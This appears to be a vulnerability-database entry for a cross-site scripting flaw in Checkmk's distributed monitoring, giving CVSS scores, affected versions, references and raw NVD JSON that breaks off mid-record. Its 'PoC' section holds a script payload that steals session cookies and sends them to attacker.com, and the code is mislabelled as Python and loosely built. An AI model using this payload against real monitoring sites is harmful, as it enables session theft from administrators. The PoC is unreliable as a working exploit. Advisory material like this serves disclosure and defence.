CVE-2025-39663

Description

Cross-Site Scripting (XSS) vulnerability in Checkmk's distributed monitoring allows a compromised remote site to inject malicious HTML code into service outputs in the central site. Affecting Checkmk before 2.4.0p14, 2.3.0p39, 2.2.0 and 2.1.0 (eol).

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:checkmk:checkmk:2.3.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:checkmk:checkmk:2.3.0:p1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:checkmk:checkmk:2.3.0:p10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:checkmk:checkmk:2.3.0:p11:*:*:*:*:*:* - VULNERABLE

Checkmk < 2.4.0p14

Checkmk < 2.3.0p39

Checkmk 2.2.0

Checkmk 2.1.0 (已停止支持)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-39663 PoC - Checkmk Distributed Monitoring XSS
// This PoC demonstrates how a compromised remote site can inject XSS payload
// into service outputs that will be displayed on the central site

// Step 1: Prepare malicious XSS payload
const xssPayload = '<script>\n  // Steal session cookies
  document.write(\'<img src=\\'' + window.location.origin + '/log?c=' + encodeURIComponent(document.cookie) + '\\' />\');\n  // Alternative payload for credential theft\n  fetch(\'https://attacker.com/exfil?data=\' + btoa(document.cookie));\n</script>';

// Step 2: Inject payload into service output on compromised remote site
// This would typically be done through the Checkmk API or by modifying
// the checkmk_agent configuration on the remote site
const injectPayload = {
  site_id: 'compromised_remote_site',
  check_type: 'custom_check',
  service_description: 'Critical Service Status',
  output: 'OK - Service running normally' + xssPayload,
  performance_data: 'time=0.123'
};

// Step 3: The payload will be synced to central site and stored
// When admin views service details, XSS executes in their browser

// Alternative: Direct API exploitation (if applicable)
/*
POST /check_mk/webapi.py HTTP/1.1
Host: central-site.example.com
Content-Type: application/x-www-form-urlencoded

action=push_status&site=compromised_remote&
output=<script>alert('XSS')</script>&
service_description=TestService
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-39663
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-39663
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-39663/
[4] VulDB https://vuldb.com/cve/CVE-2025-39663
[5] https://checkmk.com/werk/17998
[6] https://github.com/sbaresearch/advisories/tree/82fd27e4570433464c30b35150b197db9a850f4e/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting
[7] http://seclists.org/fulldisclosure/2025/Nov/0
[8] https://github.com/sbaresearch/advisories/tree/82fd27e4570433464c30b35150b197db9a850f4e/2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-39663", "sourceIdentifier": "[email protected]", "published": "2025-10-30T11:15:32.400", "lastModified": "2025-12-03T20:06:16.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting (XSS) vulnerability in Checkmk's distributed monitoring allows a compromised remote site to inject malicious HTML code into service outputs in the central site. Affecting Checkmk before 2.4.0p14, 2.3.0p39, 2.2.0 and 2.1.0 (eol)."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.7, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.3.0", "matchCriteriaId": "1D767AB0-24B0-4BDE-8B7F-90BD7A40E496"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "83202950-840A-4CB7-AD96-CE62E84FABD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p1:*:*:*:*:*:*", "matchCriteriaId": "310A2FA2-633A-48FB-A5C2-9A9A922E72E2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p10:*:*:*:*:*:*", "matchCriteriaId": "3C0F1DC8-D9DF-4A7A-80DC-618FAB091375"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p11:*:*:*:*:*:*", "matchCriteriaId": "9B0A1E3E-1B5A-4346-95BC-DE6FF6EE14CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p12:*:*:*:*:*:*", "matchCriteriaId": "EB52B2A7-BDC1-4A4F-ABAF-69C1BA8E83C2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p13:*:*:*:*:*:*", "matchCriteriaId": "9F89225F-6969-4D89-B889-9CB09972825B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p14:*:*:*:*:*:*", "matchCriteriaId": "2A1B23EA-4571-4E4E-80BC-FD76FFD83FFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p15:*:*:*:*:*:*", "matchCriteriaId": "625A6998-5DAE-4538-9760-20523CCE501F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p16:*:*:*:*:*:*", "matchCriteriaId": "6EFD4461-2C37-418F-90AD-3A956B2D91C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p17:*:*:*:*:*:*", "matchCriteriaId": "88523633-844C-41FE-ADF1-74D6AA2BCE6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p18:*:*:*:*:*:*", "matchCriteriaId": "5DA03E01-06D1-4E18-9C7B-CB6E49E5954B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p19:*:*:*:*:*:*", "matchCriteriaId": "91F171B6-7F9A-4B9B-B53D-277FE74124F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p2:*:*:*:*:*:*", "matchCriteriaId": "7D1993E3-C4F9-4D78-BD02-A0B22D93BF1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:checkmk:checkmk:2.3.0:p20:*:*:*:*:*:*", "matchC ... (truncated)